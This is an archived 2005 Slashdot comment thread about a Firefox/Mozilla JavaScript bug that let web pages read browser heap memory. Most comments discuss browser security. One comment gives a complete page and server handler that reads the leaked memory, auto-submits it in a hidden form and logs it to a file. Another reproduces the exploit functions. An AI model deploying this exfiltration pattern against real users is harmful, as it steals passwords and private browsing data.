Please create an account to participate in the Slashdot moderation system

 


Forgot your password?
Close
typodupeerror
×
Security Bug Mozilla The Internet IT

Mozilla / Firefox Memory Exposure Vulnerability 132

Posted by timothy from the mine-sure-is-vulnerable dept.
JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."
This discussion has been archived. No new comments can be posted.

Mozilla / Firefox Memory Exposure Vulnerability More

Mozilla / Firefox Memory Exposure Vulnerability

Comments Filter:

  • Did the Mozilla/Firefox guys ignore a warning? (Score:4, Insightful)

    by astrashe ( 7452 ) on Monday April 04, 2005 @04:06PM (#12136993) Journal
    Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?

  • Confusing write-up (Score:4, Interesting)

    by Smack ( 977 ) on Monday April 04, 2005 @04:10PM (#12137036) Homepage
    Can a remote site actually get access to this information, or is it only displayable on the screen?
    • It's available to javascript, which is fully capable of doing a browser redirect and sending the mem dump along as GET data.

    • Re:Confusing write-up (Score:5, Informative)

      by cjsnell ( 5825 ) on Monday April 04, 2005 @04:13PM (#12137082) Journal
      Can a remote site actually get access to this information, or is it only displayable on the screen?

      The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

      Yes, this is very dangerous.

      • Ok, confirmed (Score:5, Informative)

        by cjsnell ( 5825 ) on Monday April 04, 2005 @04:44PM (#12137513) Journal
        You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason [masonhq.com] page to do this:
        <HTML>
        <HEAD>
        <TITLE>Nasty Demo</TITLE>
        </HEAD>
        <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
        <SCRIPT language="JavaScript">
        function genGluck(str){
        var x = str;
        var rx=/end/i;
        x = x.replace(rx,function($1){
        $1.match(rx);
        return "";
        });
        x = x.replace(/^end/,"");
        return x;
        }

        function readMemory()
        {

        First peice of readMemory() removed to satisfy Slashdot crapfilter
        mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

        document.nasty.result.value = mem;

        document.nasty.submit();

        }

        </SCRIPT>
        <FORM METHOD=POST NAME='nasty'>
        <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
        </FORM>
        <BR><BR>
        </BODY>
        </HTML>

        <%args>
        $result => ''
        </%args>
        <%init>
        open(OUTFILE,'>>/tmp/outfile');
        print $result OUTFILE;
        close(OUTFILE);
        </%init>
    • Well it would seem that since the demonstration output the information it read into that textbox, it was able to read the information directly from memory. Then again, I'm not an expert, so although I'm quite positive, I can't say for sure.
    • AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.

    • Re:Confusing write-up (Score:3, Interesting)

      by Kelerain ( 577551 )
      If they can display it in a form like that, they could submit that information in a hidden form window on a stie where you typically expect to submit info (a login page for example). Javascript can talk to a website back end as well I think.

      Also from the article:
      "A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."

      So yeah, this is a bit more dangerous than the old load the root folder in an ifr

    • Re:Confusing write-up (Score:4, Interesting)

      by Sentry21 ( 8183 ) on Monday April 04, 2005 @04:18PM (#12137134) Journal
      Javascript could access this, then send that information to a form via a GET request (URLencoded) to a script via a 1x1 pixel iframe hidden on the page, or even a display: hidden; iframe for that matter.

      I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.

      The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.

  • I'm shocked! (Score:5, Interesting)

    by samael ( 12612 ) <Andrew@Ducker.org.uk> on Monday April 04, 2005 @04:13PM (#12137083) Homepage
    I seem to recall that every time an IE bug appeared people would say that Mozilla was much more secure, and that it wasn't just that IE was targetted by hackers because of the popularity, but that the software was inherently more secure.

    But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.

    Is Mozilla actually more secure? Or is it just as bad as any other piece of software?
    • It's getting used more than it used to---that's a big part of it.
    • Maybe the reason for this is the growing usage of Mozilla applications. One reason often given for the security of open source (and macs) is that more users use Microsoft etc. products, which makes them larger targets. Just my two cents.

    • Re:I'm shocked! (Score:3, Informative)

      by FidelCatsro ( 861135 )
      from the looks of it , these problems are not affecting the rest of the OS(as far as i can tell from the explination on secuna) i did a few tests and it is only reading the memory area from the browser , how far into the memory it can go i do not know (does it say ? the secuna advisory is shallow on details as ussual).
      Well unlike MSIE this is a bug rather than a feature(ActiveX) and all software has bugs but aparently it is patched so will be rolled out soon.
      Getting details on this is not the easyes but aco
      • How in the hell is that flamebait , i think you have a Troll with mod points after you.. I shall sacrifice my karma(n00b karma no loss i can gain it back later) by being offtopic and insulting the mod here . I was reading over the bug report myself and came across the same thing , so if anyone could expand on if this is true and has it been around for 8 years then please do tell us. Bad moderation , really bad. Fidel Welcome to my freind list
    • The possibility of identity theft is nothing to be careless about. However, Mozilla on Unix/Linux still has the advantage over IE on Windows, in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker. Desktop Windows pre-XP had no problem with anything a user did, up to and including deleting the C:\WINDOWS directory.

      So the original assertion is still, at least partly true: The software underneath the apps is more secure.

      • Re:I'm shocked! (Score:3, Insightful)

        by samael ( 12612 )
        Which is fair enough.

        Of course, I can reinstall the OS in about two hours.

        It's my documents I actually care about...
        • You can reinstall the OS in about two hours, sure. If you know you've been owned. So, then, do you reinstall every day? Every 12 hours? If you care about your documents, does it matter being owned? I think so.
        • Two hours doing something you didn't want to do is a lot of time.
          Two hours when you have a deadline is a lot of money.
          Two hours in the workplace would not be acceptable.

          Plus, you would need to know your system has been compromised in the first place, and then reinstall the same unsecure software.

          With mozilla, you could wait 8 more hours, and install a patched version of your software.

      • in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker

        To be fair, a good bug in Mozilla can take your X server down, or at least make it so unresponsive that you can't do anything. Or it could kill your window manager, probably logging you out. And if things do get really stuck, you may have to log in from another system (or hit the vulcan nerve pinch keys -- either kill X, get to a VC and maybe C-A-D.)

        Not quite as bad as ta

    • Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0. Microsoft has billions of dollars and more than enough developers and other personnel to make a secure product. Mozilla may have more security flaws in the short run, but it will have less in the long run because more careful consideration was made during development.

    • Re:I'm shocked! (Score:4, Informative)

      by NanoGator ( 522640 ) on Monday April 04, 2005 @05:07PM (#12137796) Homepage Journal
      "Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

      It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.

      (Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

      (Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)
      • I sincerely agree with disclaimer 2 - I _wasn't_ saying Mozilla was worse, or as bad. I was merely pointing out the dysjunction between what I'd been told and what I was seeing and asking whether I was seeing things...
      • MS programmers come from who-knows-where, and noone can see their code to see if it's good.
        MS feature list comes from marketing dept. Its release deadlines, from marketing dept + the reality. If reality-based delays don't meet marketing expectations, we don't know what they do.

        Mozilla developers can be put to test, because we can read their code, there is even people who do read their code. If you got any conclusions on the mozilla developers skill, you couldn't extrapolate them to MS developers, because y
        • "MS programmers come from who-knows-where,"

          And Open Source programmers come from the good programmers cabbage patch or something?

          " there is even people who do read their code."

          If they feel like it. Sadly, errors and half-assed functionality still get through.

          "Mozilla feature list comes from user feedback + whatever the maintainers feel is sensible to add."

          Whatever they feel like adding. (Or, more appropriately, copying from another app.)

          "So, what I mean is that there can be other reasons than
          • Opera suxx : )

            I believe you are not quoting right.
            The OP stated that there is some amount of error inherent to software development, and that MS developers were supposed to be assumed to have the same quality as mozilla developers.

            What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important.

            What I exactly meant is that it does matter what you are using, because you can make an more informed decision about whether yo
            • "Opera suxx : )"

              Actually, from the end-user point of view, Opera's probably the best one out there. Depends on how you view it, though. :)

              "What I meant is that mozilla developers produce code of a much more measurable (for the general public) quality, and that fact for itself is important."

              I'm not sure I agree with that, but I don't think I can strongly dispute it either. Frankly, I'm not impressed with OSS software. I mean, some of it I am. A lot of it, I'm not. My idea of quality is that featur
              • Ok, again.
                Opera, I used to like.
                Now I don't use windows anymore, and I choose not to use non-free software, for ethical rather than technical reasons. That doesn't mean I don't care about features. I even run some non-free software when I just need to, to get my work done.

                What happens to me with Opera is that it was great, tabs were really great. Now Firefox is just smoother to me. I am a usability freak, too. It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I lik
                • "It just happens that Firefox doesn't have usability issues that interfere with _my_ habits. I like, for example, its handling of dialogs, explanation of actions and defaults."

                  To each is own. Me personally, I enjoy all the little things they did to make browsing easier. Magnifying glass, 'paste and go' in the address bar, the notes panel, the mail client that is brilliant for handling forum email, etc. Whenever I use FireFox, I end up looking for buttons that aren't there.

                  "When you talk about innovat

    • Re:I'm shocked! (Score:5, Interesting)

      by Ogerman ( 136333 ) on Tuesday April 05, 2005 @04:07AM (#12141824)
      Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

      In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?

      What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.
    • IE bugs are a real problem because you can't hide from it.
      If mozilla has some critic bug, you can always disable mozilla and use konqueror until mozilla releases a fix. That would be a day or two without mozilla.
      In an IE-scenario, you would not be able to disable IE, plus there's no reasonable amount of time after which you can expect a bug will be fixed.
      Noone is talking about bug-free software. Bug-free software is just not worth it, it would take too muuch time and money to be useful.

      The thing with IE is
    • Whether it's open source or not doesn't mean much with respect to security.

      If you can't or don't want to do an audit of the source, it's usually safe to assume it's probably just as bad as whatever software the Mozilla programmers used to write.

      A good tree produces good fruit. A bad tree produces bad fruit. Sure you can get a tree to change, but it often takes years (see BIND, Sendmail).

      The fact that Mozilla crashes regularly (but not so predictably) on normal use (well at least my normal use ;) ) means

  • oh man (Score:2, Funny)

    by Anonymous Coward
    all those l33t hackers will be able to see all my pr0n!
  • Crashed firefox when I tried it.

  • They say that open source... (Score:1, Insightful)

    by Anonymous Coward
    ...is faster at fixing serious security flaws than closed source. Now this here is a fairly nasty vulnerability; not as bad as remote code execution, certainly, but still something I'd want fixed on my mum's PC as quickly as possible. So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this vulnerability - not just patch it in the nightlies, as that is trivial - but include it in an automatic update, like Microsoft would? I'm betting on weeks or months (not flame-baiti
    • I'm guessing you'll see a patch within 24 hours. *Fingers crossed*
    • is faster at fixing serious security flaws than closed source

      Considering this whole is already fixed, it's hard to ask for faster than that!

      On the other hand...

      So I'm wondering, just how long will the Mozilla foundation take to distribute a fix for this

      That's another question altogether, and one that isn't done so well with Firefox. Still far better than with IE (where you see actively exploited vulnerabilities listed on MS's IE page that aren't fixed for months!). This is something the Mozilla folks

  • It looks like it requires Javascript (Score:3, Interesting)

    by wowbagger ( 69688 ) on Monday April 04, 2005 @04:20PM (#12137160) Homepage Journal
    It looks like, in order to make use of this flaw, the attacker must get the victim to run Javascript.

    Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".

    I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask be before allowing any cookies to be set on my browser.

    If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cooking on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.

    Cookies are fine for sites which require log-in (e.g. /.). Javascript is fine for sites that need to do some client side processing (e.g. order entry sites which use JS to compute the order amounts to avoid a round-trip to the server). Flash is fine for some applications.

    But please don't over use them.
    • Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.
    • Flash is fine for some applications.

      I have yet to see a web application in Flash that couldn't be implemented in plain HTML with maybe a touch of server-side scripting. So-called Flash "movies" don't count, because those could simply be saved to disk via web browser without involving a plugin, and then could be played back without any online component at all.

      Of greatest annoyance are websites with Flash intros lacking a way to get past the intro, or with Flash navigation instead of a simple imagemap. N
    • I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window

      Opening a new window has been depricated in XHTML - the only way to do it is JavaShit. Which is good because I hate webmasters assuming I want links opened in a new window (I almost never do - if I did I would've clicked "open in new window"). Unfortunately it's bad coz they'll just use Javascript instead. :(

  • Definately a big hole (Score:5, Insightful)

    by RzUpAnmsCwrds ( 262647 ) on Monday April 04, 2005 @04:27PM (#12137241)
    This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.

    If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.

    Time for Firefox 1.03.

  • Simple JavaScript (Score:2, Insightful)

    by duerra ( 684053 )
    It works if you don't click quickly and repeatedly in Firefox.

    It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.

    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {
    var mem = genGluck("{10,246 "X's" here}end");

    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g,

  • No problem here (Score:2, Informative)

    by jkerman ( 74317 )
    just displays all "XXXXXXXXXXX" for me.

    using OSX with nightly builds auto-downloaded with FireFix [macupdate.com] (which is a really neat app)

  • Safari slightly vulnerable? (Score:3, Insightful)

    by inio ( 26835 ) on Monday April 04, 2005 @04:49PM (#12137582) Homepage
    In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks light it might be a little vulnerable too.
    • No, Safari doesn't support Javascript's function objects (lambdas?), which the test seems to use. I don't know if rewriting the test in a different way would make it work, but I doubt it. It appears to be a flaw in the regular expression engine in Gecko.

  • Download the latest patched version right here (Score:3, Informative)

    by OmegaGX ( 120040 ) on Monday April 04, 2005 @04:50PM (#12137600) Journal
    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nig htly/latest-trunk/firefox-1.0+.en-US.win32.install er.exe [mozilla.org]
    I just used it and I am not vulnerable: all I see are lot's of X's just like in IE.

  • Access to firefox heap, not entire system (Score:3, Insightful)

    by jgoemat ( 565882 ) on Monday April 04, 2005 @04:56PM (#12137669)
    This exploits a vulnerability in Mozilla/FireFox's javascript engine. It allows the javascript code on the web page to access an arbitrary amount of heap data of the FireFox application. The locations in memory and the size of the block returned cannot be set, so you basically get random data from FireFox's heap. Most likely under a kilobyte of data will be returned, and it will most likely be data from some web page or file you downloaded.

    This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.

    This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.

    The only way to be save right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.

    • Re:Access to firefox heap, not entire system (Score:1, Informative)

      by Anonymous Coward

      Seeing as many sites (including /.) require javascript to use, this really isn't a good option.

      This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.

      So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascipt for that one website, and switch it off again afterwards.

      As far as I can te

      • slightly offtopic, but: is there any firefox plugin that allows you to map which sites NEED jscript on (and then when you visit those sites, it auto 'presses' the jscript enable button)? similarly, when you switch to a tab or window that has a site that is mapped (manually, by you, in some config file) as NOT needing jscript, it disables it?

        I'd LOVE to have that. there are only a handful of sites that I use that NEED js. most don't. and in some sites, its BAD to have js on (ie, I get more ads with js t
      • Has anybody looked into making a "guess what the JavaScript does" plugin? It would examine the JavaScript on a button or link and take a guess as to what the URL it is trying to open is, and open it.

        Certainly I have been able to guess the URL by looking at one-line samples of Javascript. Is this possible in general? Would it be good enough to allow you to leave javascript off?
        • My guess is that it would go to the delete page without asking the question. However an intelligent one may be able to detect that it is too complex, and go to a page saying "it's trying to execute this javascript and here are my guesses as to the URL's it's trying to open "
    • slash requires js?

      since when?

      I disable js for all but 1 or 2 sites that I visit.

      prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.

      but you don't need js for slash. you never have.

  • comma (Score:5, Insightful)

    by Anonymous Coward on Monday April 04, 2005 @05:39PM (#12138189)
    which can be exploited by any web site to read all memory, which the browser process has access to

    I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between

    read all memory, which the browser process has access to

    and

    read all memory which the browser process has access to

    Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.

    • According to the grammar checker in MS Word, the second example is still incorrect, and should instead say this:
      "read all memory
      that the browser process has access to"
      The only way to pacify MS Word, if you insist upon using "which", is to put the comma before it.

      Of course, this is all to say nothing of ending the sentence with a preposition, but that hardly has the impact noted by the parent ;)
    • I think the Simpsons said it best when the family goes to the best lawyer in town and hands him a coupon:
      Coupon: "No money down!"
      Hutz: "What? This thing is all screwed up"
      [hutz writes on it]
      Coupon now reads: "No. [M]oney down!"
  • maybe my ubuntu hoary system is patched? or this doesn't affect linux?
    • Yeah I noticed same thing and posted about it somewhere here.

      Browser string is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2), the 4/4/05 makes me think a fix was backported for us. Gives me a little more happiness about Ubuntu and Debian, though I'm sure it has made its way into other distributions as well.

  • Firefox Version 1.02: Clicking the link repeatedly and quickly causes a crash. Any others have the same thing happen? If so, this could be a bigger problem than just a security hole.

    • Re:CRASH? (Score:3, Interesting)

      by srstoneb ( 256638 )
      The first time I tried it, it didn't merely crash Firefox. When I clicked the "test now" link my entire system immediately died, and began rebooting. After reboot, the test now works (and confirms my vulnerability).

      Windows 98 SE, Firefox 1.0.2.
      • whole system crash? Haven't had any of those since ME. I suspect 98SE. Something is wiggy with the javascript. I've never really liked it and this proves that Java is not the cure-all to every application need.
  • I'm running Firefox 1.0.1. I'm STILL waiting for the updater to report that 1.0.2 is available. Even if I manually tell it to check for updates, it says none are available.

    If they haven't even put 1.0.2 onto the autoupdater, how long will it be before patches like this make it out? It's pretty stupid.

  • Other Gecko-based browsers affected as well. (Score:3, Insightful)

    by Lazyhound ( 542184 ) on Monday April 04, 2005 @10:30PM (#12140308)
    K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.

Slashdot Top Deals

He has not acquired a fortune; the fortune has acquired him. -- Bion

Close